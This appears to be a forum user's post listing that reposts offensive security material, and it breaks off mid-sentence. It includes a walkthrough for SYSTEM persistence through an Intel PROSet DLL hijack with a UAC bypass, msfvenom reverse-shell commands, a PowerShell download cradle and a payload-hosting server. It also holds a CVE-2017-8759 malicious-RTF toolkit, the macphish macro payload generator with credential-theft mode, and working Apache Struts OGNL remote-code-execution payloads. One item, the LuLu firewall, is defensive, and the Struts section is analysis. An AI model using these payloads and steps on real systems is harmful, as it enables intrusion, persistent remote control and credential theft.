Everything posted by Nytro

  1. SYSTEM-level Persistence via Intel PROSet Wireless RpcRtRemote.dll Backdoor
Posted on March 17, 2017 by x4zx
** Update 4/14/2017: PowerShell exploit code: https://github.com/0rbz/Intel_Inside

The Intel PROSet Wireless connection management software is vulnerable to a DLL hijack which results in privilege escalation and SYSTEM-level persistence via a backdoored "RpcRtRemote.dll" file. To execute this particular attack, we'll chain it together with a CompMgmtLauncher.exe UAC bypass (similar to enigma0x3's and others' work) to gain elevated permissions in order to write our backdoored file into the required location at "C:\Program Files\Common Files\Intel\WirelessCommon\".

The issue arises because "C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe" (a SYSTEM-level service) loads "RpcRtRemote.dll" from the same directory, a DLL which doesn't exist on a default installation of the package. This allows us to supply our own backdoored DLL, which we'll execute manually for SYSTEM-level privileges; it also gives us SYSTEM-level reverse_https Meterpreter persistence at every boot, since RegSrvc.exe runs as a local system service at boot time.

This was tested on a fully patched 64-bit Windows 7 machine with the 64-bit version of the PROSet Wireless package ("Wireless_19.40.0_PROSet64_Win7.exe"), and we'll use a 64-bit reverse_https Meterpreter DLL payload. This probably also works with x86, but the 64-bit DLL offers a bit more "evasion" when it comes to antivirus detection. This attack vector is also handy for maintaining a somewhat discreet side channel out of a target network. It assumes you already have a reverse_https Meterpreter shell on a box as a user in the local administrators group, with UAC set to anything but "Always Notify", and you just need another method to "getsystem" on your target.

A vulnerable host should have the "RegSrvc.exe" process running, so check for it with something like:

tasklist |find "RegSrvc.exe"

The resource file settings I'm using for the listener are something like:

intel.rc:
use exploit/multi/handler
set ExitOnSession false
set LHOST 0.0.0.0
set LPORT 5555
set PAYLOAD windows/x64/meterpreter/reverse_https
set HandlerSSLCert custom.pem
exploit -j

The first step is to create your 64-bit backdoored RpcRtRemote.dll file:

msfvenom -p windows/x64/meterpreter/reverse_https -f dll LHOST=192.168.13.26 LPORT=5555 > RpcRtRemote.dll

Host the above DLL on a web server you control (see the hosting sketch at the end of this walkthrough). We'll use PowerShell to bring it down to the target directory later. Create the following PowerShell script, and also host it on a web server you control. Point the "$pl_url" variable to your backdoored RpcRtRemote.dll file:

RpcRtRemote_downloader.ps1:
$dlx = New-Object System.Net.WebClient
$pl_url = 'https://x42.obscurechannel.com/RpcRtRemote.dll';
$lfile = 'C:\Program Files\Common Files\Intel\WirelessCommon\RpcRtRemote.dll';
$dlx.DownloadFile($pl_url,$lfile);

Let's test. From your UAC-restricted admin shell, execute the following (this could all be scripted into a PowerShell or Metasploit module!):
This executes a CompMgmtLauncher.exe UAC bypass via wmic (because it works), downloads our backdoored RpcRtRemote.dll (the 64-bit reverse_https Meterpreter payload), and copies it to the WirelessCommon directory using a PowerShell download cradle:

reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep Bypass -windowstyle hidden -nop iex -Command (New-Object Net.WebClient).DownloadString('https://yourserver.com/RpcRtRemote_downloader.ps1')" /f

wmic process call create "cmd.exe /c C:\windows\system32\CompMgmtLauncher.exe"

Wait before running the next step; the DLL download may take a few seconds depending on its size, available bandwidth, etc. Then re-execute the UAC bypass to re-launch "RegSrvc.exe" as an elevated process:

reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe" /f

wmic process call create "cmd.exe /c C:\windows\system32\CompMgmtLauncher.exe"

Clean up:

reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f

At this point, you should have a new elevated Meterpreter session and should be able to execute a "getsystem" command. This will also persist as an NT AUTHORITY\SYSTEM shell upon every reboot.

The flow: (diagram in the original post)

Defenders:
  • Configure UAC to "Always Notify"
  • Remove users from the local administrators group
  • Monitor for rogue connections originating from rundll32.exe (only effective if the attacker doesn't migrate to another valid process)

- @0rbz_
Source: https://www.obscurechannel.com/x42/?p=378
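As an aside on the hosting step referenced earlier ("host the above DLL on a web server you control"), here is a minimal sketch of serving the two files from the attacker host. This is not part of the original post: it assumes Python 3 on the attacker machine and uses the filenames from the walkthrough; the post's example URLs are HTTPS, so in practice you would either front this with TLS or point $pl_url and the DownloadString URL at plain HTTP on your chosen port.

import http.server
import socketserver

PORT = 8080  # hypothetical listener port; match whatever your payload URLs use

class PayloadHandler(http.server.SimpleHTTPRequestHandler):
    # Only serve the two files the chain needs; everything else gets a 404.
    ALLOWED = {"/RpcRtRemote.dll", "/RpcRtRemote_downloader.ps1"}

    def do_GET(self):
        if self.path not in self.ALLOWED:
            self.send_error(404)
            return
        super().do_GET()  # serves the file from the current working directory

with socketserver.TCPServer(("0.0.0.0", PORT), PayloadHandler) as httpd:
    httpd.serve_forever()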
  2. Exploit toolkit CVE-2017-8759 - v1.0
Exploit toolkit CVE-2017-8759 - v1.0 is a handy Python script which gives pentesters and security researchers a quick and effective way to test the Microsoft .NET Framework RCE. It can generate a malicious RTF file and deliver a Metasploit / Meterpreter / other payload to the victim without any complex configuration.

Disclaimer: This program is for educational purposes ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that I (bhdresh) am not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using this program you accept the fact that any damage (data loss, system crash, system compromise, etc.) caused by the use of these programs is not bhdresh's responsibility.

Release note: Introduced the following capabilities to the script:
  • Generate malicious RTF file
  • Exploitation mode for the generated RTF file

Version: Python 2.7.13
Scenario: Deliver local Meterpreter payload
Video tutorial: (embedded in the original post)

Example commands:
1) Generate malicious RTF file
# python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (Optional, if using an MSF payload): Generate Metasploit payload and start the handler
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Start the toolkit in exploit mode to deliver the local payload
# python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

Command line arguments:
# python cve-2017-8759_toolkit.py -h
This is a handy toolkit to exploit CVE-2017-8759 (Microsoft .NET Framework RCE)
Modes:
-M gen  Generate malicious file only
Generate malicious RTF/PPSX file:
-w <Filename.rtf>  Name of the malicious RTF file (share this file with the victim).
-u <http://attacker.com/test.txt>  Path of the remote txt file. Normally, this should be a domain or IP where this tool is running, for example http://attackerip.com/test.txt (this URL will be included in the malicious RTF file and will be requested once the victim opens it).
-M exp  Start exploitation mode
Exploitation:
-p <TCP port: default 80>  Local port number.
-e <http://attacker.com/shell.exe>  The path of an executable file / meterpreter shell / payload which needs to be executed on the target.
-l </tmp/shell.exe>  Local path of an executable file / meterpreter shell / payload.

Author: @bhdresh
Credit: @Voulnet, @vysec, @bhdresh
Source: https://github.com/bhdresh/CVE-2017-8759
  3. macphish
Office for Mac Macro Payload Generator

Attack vectors
There are 4 attack vectors available:
  • beacon
  • creds
  • meterpreter
  • meterpreter-grant
For the 'creds' method, macphish can generate the AppleScript script directly, in case you need to run it from a shell.

beacon
On execution, this payload will signal our listening host and provide basic system information about the victim. The simplest way of generating a beacon payload is:
$ ./macphish.py -lh <listening host>
By default, it uses curl, but other utilities (wget, nslookup) can be used by modifying the command template.

creds
$ ./macphish.py -lh <listening host> -lp <listening port> -a creds

meterpreter
The simplest way of generating a meterpreter payload is:
$ ./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter

meterpreter-grant
To generate a meterpreter payload that calls GrantAccessToMultipleFiles() first:
$ ./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter-grant

For meterpreter attacks, only Python payloads are supported at the moment.
Source: https://github.com/cldrn/macphish
  4. LuLu
⚠ Please note: LuLu is currently in alpha. This means it is under active development and still contains known bugs. As such, installing it on any production systems is not recommended at this time! Also, as with any security tool, proactive attempts to specifically bypass LuLu's protections will likely succeed. By design, LuLu (currently) implements only limited 'self-defense' mechanisms.

LuLu is a free, open-source macOS firewall that aims to block unauthorized (outgoing) network traffic, unless explicitly approved by the user. Full details and usage instructions can be found here.

To Build
LuLu should build cleanly in Xcode (though you will have to remove the code-signing constraints, or replace them with your own Apple developer/kernel code-signing certificate).

To Install
For now, LuLu must be installed via the command line. Build LuLu or download the pre-built binaries/components from the deploy directory (LuLu.zip contains everything), then execute the configuration script (configure.sh) with the -install flag, as root:

//install
$ sudo configure.sh -install

Link: https://github.com/objective-see/LuLu
  5. An Analysis of CVE-2017-5638 Monday, March 27, 2017 at 12:10PM At GDS, we’ve had a busy few weeks helping our clients manage the risk associated with CVE-2017-5638 (S2-045), a recently published Apache Struts server-side template injection vulnerability. As we began this work, I found myself curious about the conditions that lead to this vulnerability in the Struts library code. We often hear about the exploitation of these types of vulnerabilities, but less about the vulnerable code that leads to them. This post is the culmination of research I have done into this very topic. What I present here is a detailed code analysis of the vulnerability, as well as payloads seen in the wild and a discussion on why some work while others don’t. I also present a working payload for S2-046, an alternate exploit vector that is capable of bypassing web application firewall rules that only examine request content types. I conclude with a couple of takeaways I had from this research. For those unfamiliar with the concept of SSTI (server-side template injection), it’s a classic example of an injection attack. A template engine parses what is intended to be template code, but somewhere along the way ends up parsing user input. The result is typically code execution in whatever form the template engine allows. For many popular template engines, such as Freemarker, Smarty, Velocity, Jade, and others, remote code execution outside of the engine is often possible (i.e. spawning a system shell). For cases like Struts, simple templating functionality is provided using an expression language such as Object-Graph Navigation Language (OGNL). As is the case for OGNL, it is often possible to obtain remote code execution outside of an expression engine as well. Many of these libraries do offer mechanisms to help mitigate remote code execution, such as sandboxing, but they tend to be disabled by default or trivial to bypass. From a code perspective, the simplest condition for SSTI to exist in an application is to have user input passed into a function that parses template code. Losing track of what functions handle values tainted with user input is an easy way to accidentally introduce all kinds of injection vulnerabilities into an application. To uncover a vulnerability like this, the call stack and any tainted data flow must be carefully traced and analyzed. This was the case to fully understand how CVE-2017-5638 works. The official CVE description reads: The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 mishandles file upload, which allows remote attackers to execute arbitrary commands via a #cmd= string in a crafted Content-Type HTTP header, as exploited in the wild in March 2017. This left me with the impression that the vulnerable code existed in the Jakarta Multipart parser and that it was triggered by a “#cmd=” string in the Content-Type HTTP header. Using Struts 2.5.10 as an example, we’ll soon learn that the issue is far more nuanced than that. To truly grasp how the vulnerability works, I needed to do a full analysis of relevant code in the library. Beginning With A Tainted Exception Message An exception thrown, caught, and logged when this vulnerability is exploited reveals a lot about how this vulnerability works. As we can see in the following reproduction, which results in remote code execution, an exception is thrown and logged in the parseRequest method in the Apache commons upload library. 
This is because the content-type of the request didn’t match an expected valid string. We also notice that the exception message thrown by this library includes the invalid content-type header supplied in the HTTP request. This in effect taints the exception message with user input. Reproduction Request: POST /struts2-showcase/fileupload/doUpload.action HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: ${(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} Content-Length: 0 Reproduction Response: HTTP/1.1 200 OK Set-Cookie: JSESSIONID=16cuhw2qmanji1axbayhcp10kn;Path=/struts2-showcase Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Jetty(8.1.16.v20140903) Content-Length: 11 testwebuser Logged Exception: 2017-03-24 13:44:39,625 WARN [qtp373485230-21] multipart.JakartaMultiPartRequest (JakartaMultiPartRequest.java:69) - Request exceeded size limit! 
org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/mixed stream, content type header is ${(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} at org.apache.commons.fileupload.FileUploadBase$FileItemIteratorImpl.(FileUploadBase.java:948) ~[commons-fileupload-1.3.2.jar:1.3.2] at org.apache.commons.fileupload.FileUploadBase.getItemIterator(FileUploadBase.java:310) ~[commons-fileupload-1.3.2.jar:1.3.2] at org.apache.commons.fileupload.FileUploadBase.parseRequest(FileUploadBase.java:334) ~[commons-fileupload-1.3.2.jar:1.3.2] at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.parseRequest(JakartaMultiPartRequest.java:147) ~[struts2-core-2.5.10.jar:2.5.10] at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.processUpload(JakartaMultiPartRequest.java:91) ~[struts2-core-2.5.10.jar:2.5.10] at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.parse(JakartaMultiPartRequest.java:67) [struts2-core-2.5.10.jar:2.5.10] at org.apache.struts2.dispatcher.multipart.MultiPartRequestWrapper.(MultiPartRequestWrapper.java:86) [struts2-core-2.5.10.jar:2.5.10] at org.apache.struts2.dispatcher.Dispatcher.wrapRequest(Dispatcher.java:806) [struts2-core-2.5.10.jar:2.5.10] [..snip..] The caller responsible for invoking the parseRequest method that generates the exception is in a class named JakartaMultiPartRequest. This class acts as a wrapper around the Apache commons fileupload library, defining a method named processUpload that calls its own version of the parseRequest method on line 91. This method creates a new ServletFileUpload object on line 151 and calls its parseRequest method on line 147. core/src/main/java/org/apache/struts2/dispatcher/multipart/JakartaMultiPartRequest.java: 90: protected void processUpload(HttpServletRequest request, String saveDir) throws FileUploadException, UnsupportedEncodingException { 91: for (FileItem item : parseRequest(request, saveDir)) { 92: LOG.debug("Found file item: [{}]", item.getFieldName()); 93: if (item.isFormField()) { 94: processNormalFormField(item, request.getCharacterEncoding()); 95: } else { 96: processFileField(item); 97: } 98: } 99: } [..snip..] 
144: protected List<FileItem> parseRequest(HttpServletRequest servletRequest, String saveDir) throws FileUploadException { 145: DiskFileItemFactory fac = createDiskFileItemFactory(saveDir); 146: ServletFileUpload upload = createServletFileUpload(fac); 147: return upload.parseRequest(createRequestContext(servletRequest)); 148: } 149: 150: protected ServletFileUpload createServletFileUpload(DiskFileItemFactory fac) { 151: ServletFileUpload upload = new ServletFileUpload(fac); 152: upload.setSizeMax(maxSize); 153: return upload; 154: } Looking at the stacktrace, we can see that the processUpload method is called by JakartaMultiPartRequest’s parse method on line 67. Any thrown exceptions from calling this method are caught on line 68 and passed to the method buildErrorMessage. Several paths exist for calling this method depending on the class of the exception thrown, but the result is always that this method is called. In this case the buildErrorMessage method is called on line 75. core/src/main/java/org/apache/struts2/dispatcher/multipart/JakartaMultiPartRequest.java: 64: public void parse(HttpServletRequest request, String saveDir) throws IOException { 65: try { 66: setLocale(request); 67: processUpload(request, saveDir); 68: } catch (FileUploadException e) { 69: LOG.warn("Request exceeded size limit!", e); 70: LocalizedMessage errorMessage; 71: if(e instanceof FileUploadBase.SizeLimitExceededException) { 72: FileUploadBase.SizeLimitExceededException ex = (FileUploadBase.SizeLimitExceededException) e; 73: errorMessage = buildErrorMessage(e, new Object[]{ex.getPermittedSize(), ex.getActualSize()}); 74: } else { 75: errorMessage = buildErrorMessage(e, new Object[]{}); 76: } 77: 78: if (!errors.contains(errorMessage)) { 79: errors.add(errorMessage); 80: } 81: } catch (Exception e) { 82: LOG.warn("Unable to parse request", e); 83: LocalizedMessage errorMessage = buildErrorMessage(e, new Object[]{}); 84: if (!errors.contains(errorMessage)) { 85: errors.add(errorMessage); 86: } 87: } 88: } Since the JakartaMultiPartRequest class doesn’t define the buildErrorMessage method, we look to the class that it extends which does: AbstractMultiPartRequest. core/src/main/java/org/apache/struts2/dispatcher/multipart/AbstractMultiPartRequest.java: 98: protected LocalizedMessage buildErrorMessage(Throwable e, Object[] args) { 99: String errorKey = "struts.messages.upload.error." + e.getClass().getSimpleName(); 100: LOG.debug("Preparing error message for key: [{}]", errorKey); 101: 102: return new LocalizedMessage(this.getClass(), errorKey, e.getMessage(), args); 103: } The LocalizedMessage that it returns defines a simple container-like object. The important details here are: The instance’s textKey is set to a struts.messages.upload.error.InvalidContentTypeException. The instance’s defaultMessage is set to the exception message tainted with user input. Next in the stacktrace, we can see that JakartaMultiPartRequest’s parse method is invoked in MultiPartRequestWrapper’s constructor method on line 86. The addError method called on line 88 checks to see if the error has already been seen, and if not it adds it to an instance variable that holds a collection of LocalizedMessage objects. 
core/src/main/java/org/apache/struts2/dispatcher/multipart/MultiPartRequestWrapper.java: 77: public MultiPartRequestWrapper(MultiPartRequest multiPartRequest, HttpServletRequest request, 78: String saveDir, LocaleProvider provider, 79: boolean disableRequestAttributeValueStackLookup) { 80: super(request, disableRequestAttributeValueStackLookup); [..snip..] 85: try { 86: multi.parse(request, saveDir); 87: for (LocalizedMessage error : multi.getErrors()) { 88: addError(error); 89: } On the next line of our stacktrace, we see that the Dispatcher class is responsible for instantiating a new MultiPartRequestWrapper object and calling the constructor method above. The method called here is named wrapRequest and is responsible for detecting if the request’s content type contains the substring “multipart/form-data” on line 801. If it does, a new MultiPartRequestWrapper is created on line 804 and returned. core/src/main/java/org/apache/struts2/dispatcher/Dispatcher.java: 794: public HttpServletRequest wrapRequest(HttpServletRequest request) throws IOException { 795: // don't wrap more than once 796: if (request instanceof StrutsRequestWrapper) { 797: return request; 798: } 799: 800: String content_type = request.getContentType(); 801: if (content_type != null && content_type.contains("multipart/form-data")) { 802: MultiPartRequest mpr = getMultiPartRequest(); 803: LocaleProvider provider = getContainer().getInstance(LocaleProvider.class); 804: request = new MultiPartRequestWrapper(mpr, request, getSaveDir(), provider, disableRequestAttributeValueStackLookup); 805: } else { 806: request = new StrutsRequestWrapper(request, disableRequestAttributeValueStackLookup); 807: } 808: 809: return request; 810: } At this point in our analysis, our HTTP request has been parsed and our wrapped request object (MultiPartRequestWrapper) holds an error (LocalizedMessage) with our tainted default message and a textKey set to struts.messages.upload.error.InvalidContentTypeException. Calling Struts’ File Upload Interceptor The rest of the stacktrace doesn’t provide anything terribly useful to us to continue tracing data flow. However, we have a clue for where to look next. Struts processes requests through a series of interceptors. As it turns out, an interceptor named FileUploadInterceptor is part of the default “stack” that Struts is configured to use. As we can see on line 242, the interceptor checks to see if our request object is an instance of the class MultiPartRequestWrapper. We know that it is because the Dispatcher previously returned an instance of this class. The interceptor continues to check if the MultiPartRequestWrapper object has any errors on line 261, which we already know it does. It then calls LocalizedTextUtil’s findText method on line 264, passing in several arguments such as the error’s textKey and our tainted defaultMessage. core/src/main/java/org/apache/struts2/interceptor/FileUploadInterceptor.java: 237: public String intercept(ActionInvocation invocation) throws Exception { 238: ActionContext ac = invocation.getInvocationContext(); 239: 240: HttpServletRequest request = (HttpServletRequest) ac.get(ServletActionContext.HTTP_REQUEST); 241: 242: if (!(request instanceof MultiPartRequestWrapper)) { 243: if (LOG.isDebugEnabled()) { 244: ActionProxy proxy = invocation.getProxy(); 245: LOG.debug(getTextMessage("struts.messages.bypass.request", new String[]{proxy.getNamespace(), proxy.getActionName()})); 246: } 247: 248: return invocation.invoke(); 249: } 250: [..snip..] 
259:             MultiPartRequestWrapper multiWrapper = (MultiPartRequestWrapper) request;
260: 
261:             if (multiWrapper.hasErrors()) {
262:                 for (LocalizedMessage error : multiWrapper.getErrors()) {
263:                     if (validation != null) {
264:                         validation.addActionError(LocalizedTextUtil.findText(error.getClazz(), error.getTextKey(), ActionContext.getContext().getLocale(), error.getDefaultMessage(), error.getArgs()));
265:                     }
266:                 }
267:             }

Following Localized Text

This is where things start to get interesting. A version of LocalizedTextUtil's findText method is called that tries to find an error message to return based on several factors. I have omitted the large method definition because the comment below accurately describes it. The findText method call is invoked where:
  • aClassName is set to AbstractMultiPartRequest.
  • aTextName is set to the error's textKey, which is struts.messages.upload.error.InvalidContentTypeException.
  • Locale is set to the ActionContext's locale.
  • defaultMessage is our tainted exception message as a string.
  • Args is an empty array.
  • valueStack is set to the ActionContext's valueStack.

397: /**
398:  * <p>
399:  * Finds a localized text message for the given key, aTextName. Both the key and the message
400:  * itself is evaluated as required. The following algorithm is used to find the requested
401:  * message:
402:  * </p>
403:  *
404:  * <ol>
405:  * <li>Look for message in aClass' class hierarchy.
406:  * <ol>
407:  * <li>Look for the message in a resource bundle for aClass</li>
408:  * <li>If not found, look for the message in a resource bundle for any implemented interface</li>
409:  * <li>If not found, traverse up the Class' hierarchy and repeat from the first sub-step</li>
410:  * </ol></li>
411:  * <li>If not found and aClass is a {@link ModelDriven} Action, then look for message in
412:  * the model's class hierarchy (repeat sub-steps listed above).</li>
413:  * <li>If not found, look for message in child property. This is determined by evaluating
414:  * the message key as an OGNL expression. For example, if the key is
415:  * <i>user.address.state</i>, then it will attempt to see if "user" can be resolved into an
416:  * object. If so, repeat the entire process from the beginning with the object's class as
417:  * aClass and "address.state" as the message key.</li>
418:  * <li>If not found, look for the message in aClass' package hierarchy.</li>
419:  * <li>If still not found, look for the message in the default resource bundles.</li>
420:  * <li>Return defaultMessage</li>
421:  * </ol>

Because a resource bundle is not found defining an error message for struts.messages.upload.error.InvalidContentTypeException, this process ends up invoking the method getDefaultMessage on line 573:

core/src/main/java/com/opensymphony/xwork2/util/LocalizedTextUtil.java:
570:         // get default
571:         GetDefaultMessageReturnArg result;
572:         if (indexedTextName == null) {
573:             result = getDefaultMessage(aTextName, locale, valueStack, args, defaultMessage);
574:         } else {
575:             result = getDefaultMessage(aTextName, locale, valueStack, args, null);
576:             if (result != null && result.message != null) {
577:                 return result.message;
578:             }
579:             result = getDefaultMessage(indexedTextName, locale, valueStack, args, defaultMessage);
580:         }

The getDefaultMessage method in the same class is responsible for making one last-ditch effort to find a suitable error message given a key and a locale. In our case, it still fails, so it takes our tainted exception message and calls TextParseUtil's translateVariables method on line 729.
core/src/main/java/com/opensymphony/xwork2/util/LocalizedTextUtil.java: 714: private static GetDefaultMessageReturnArg getDefaultMessage(String key, Locale locale, ValueStack valueStack, Object[] args, 715: String defaultMessage) { 716: GetDefaultMessageReturnArg result = null; 717: boolean found = true; 718: 719: if (key != null) { 720: String message = findDefaultText(key, locale); 721: 722: if (message == null) { 723: message = defaultMessage; 724: found = false; // not found in bundles 725: } 726: 727: // defaultMessage may be null 728: if (message != null) { 729: MessageFormat mf = buildMessageFormat(TextParseUtil.translateVariables(message, valueStack), locale); 730: 731: String msg = formatWithNullDetection(mf, args); 732: result = new GetDefaultMessageReturnArg(msg, found); 733: } 734: } 735: 736: return result; 737: } An OGNL Expression Data Sink As it turns out, TextParseUtil’s translateVariables method is a data sink for expression language evaluation. Just as the method’s comment explains, it provides simple template functionality by evaluating OGNL expressions wrapped in instances of ${…} and %{…}. Several versions of the translateVariables method are defined and called, with the last evaluating the expression on line 166. core/src/main/java/com/opensymphony/xwork2/util/TextParseUtil.java: 34: /** 35: * Converts all instances of ${...}, and %{...} in <code>expression</code> to the value returned 36: * by a call to {@link ValueStack#findValue(java.lang.String)}. If an item cannot 37: * be found on the stack (null is returned), then the entire variable ${...} is not 38: * displayed, just as if the item was on the stack but returned an empty string. 39: * 40: * @param expression an expression that hasn't yet been translated 41: * @param stack value stack 42: * @return the parsed expression 43: */ 44: public static String translateVariables(String expression, ValueStack stack) { 45: return translateVariables(new char[]{'$', '%'}, expression, stack, String.class, null).toString(); 46: } [..snip..] 152: public static Object translateVariables(char[] openChars, String expression, final ValueStack stack, final Class asType, final ParsedValueEvaluator evaluator, int maxLoopCount) { 153: 154: ParsedValueEvaluator ognlEval = new ParsedValueEvaluator() { 155: public Object evaluate(String parsedValue) { 156: Object o = stack.findValue(parsedValue, asType); 157: if (evaluator != null && o != null) { 158: o = evaluator.evaluate(o.toString()); 159: } 160: return o; 161: } 162: }; 163: 164: TextParser parser = ((Container)stack.getContext().get(ActionContext.CONTAINER)).getInstance(TextParser.class); 165: 166: return parser.evaluate(openChars, expression, ognlEval, maxLoopCount); 167: } With this last method call, we have traced an exception message tainted with user input all the way to the evaluation of OGNL. Payload Analysis A curious reader might be wondering how the exploit’s payload works. To start, let us first attempt to supply a simple OGNL payload that returns an additional header. We need to include the unused variable in the beginning, so that Dispatcher’s check for a “multipart/form-data” substring passes and our request gets parsed as a file upload. 
Reproduction Request: POST /struts2-showcase/fileupload/doUpload.action HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: ${(#_='multipart/form-data').(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Struts-Exploit-Test','GDSTEST'))} Content-Length: 0 Reproduction Response: HTTP/1.1 200 OK Set-Cookie: JSESSIONID=1wq4m7r2pkjqfak2zaj4e12kn;Path=/struts2-showcase Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html [..snip..] Huh? It didn’t work. A look at our logs shows a warning was logged: Logged Exception: 17-03-24 12:48:30,904 WARN [qtp18233895-25] ognl.SecurityMemberAccess (SecurityMemberAccess.java:74) - Package of target [com.opensymphony.sitemesh.webapp.ContentBufferingResponse@9f1cfe2] or package of member [public void javax.servlet.http.HttpServletResponseWrapper.addHeader(java.lang.String,java.lang.String)] are excluded! As it turns out, Struts offers blacklisting functionality for class member access (i.e. class methods). By default, the following class lists and regular expressions are used: core/src/main/resources/struts-default.xml: 41: <constant name="struts.excludedClasses" 42: value=" 43: java.lang.Object, 44: java.lang.Runtime, 45: java.lang.System, 46: java.lang.Class, 47: java.lang.ClassLoader, 48: java.lang.Shutdown, 49: java.lang.ProcessBuilder, 50: ognl.OgnlContext, 51: ognl.ClassResolver, 52: ognl.TypeConverter, 53: ognl.MemberAccess, 54: ognl.DefaultMemberAccess, 55: com.opensymphony.xwork2.ognl.SecurityMemberAccess, 56: com.opensymphony.xwork2.ActionContext"> 57: [..snip..] 63: <constant name="struts.excludedPackageNames" value="java.lang.,ognl,javax,freemarker.core,freemarker.template" > To better understand the original OGNL payload, let us try a simplified version that actually works: Reproduction Request: POST /struts2-showcase/fileupload/doUpload.action HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: ${(#_='multipart/form-data').(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Struts-Exploit-Test','GDSTEST'))}} Content-Length: 0 Reproduction Response: HTTP/1.1 200 OK Set-Cookie: JSESSIONID=avmifel7x66q9cmnsrr8lq0s;Path=/struts2-showcase Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Struts-Exploit-Test: GDSTEST Content-Type: text/html [..snip..] As we can see, this one does indeed work. But how is it bypassing the blacklisting we saw earlier? What this payload does is empty the list of excluded package names and classes, thereby rendering the blacklist useless. It does this by first fetching the current container associated with the OGNL context and assigning it to the “container” variable. You may notice that the class com.opensymphony.xwork2.ActionContext is included in the blacklist above. How is this possible then? 
The blacklist doesn’t catch it because we aren’t referencing a class member, but rather by a key that already exists in the OGNL Value Stack (defined in core/src/main/java/com/opensymphony/xwork2/ActionContext.java:102). The reference to an instance of this class is already made for us, and the payload takes advantage of this. Next, the payload gets the container’s instance of OgnlUtil, which allows us to invoke methods that return the current excluded classes and package names. The final step is to simply get and clear each blacklist and execute whatever unrestricted evaluations we want. An interesting point to make here is that once the blacklists have been emptied, they remain empty until overwritten by code or until the application has been restarted. I found this to be a common pitfall when attempting to reproduce certain payloads found in the wild or documented in other research. Some payloads failed to work because they assumed the blacklists had already been emptied, which would have likely occurred during the testing of different payloads earlier on. This emphasizes the importance of resetting application state when running dynamic tests. You may have also noticed that the original exploit’s payload used is a bit more complicated than the one 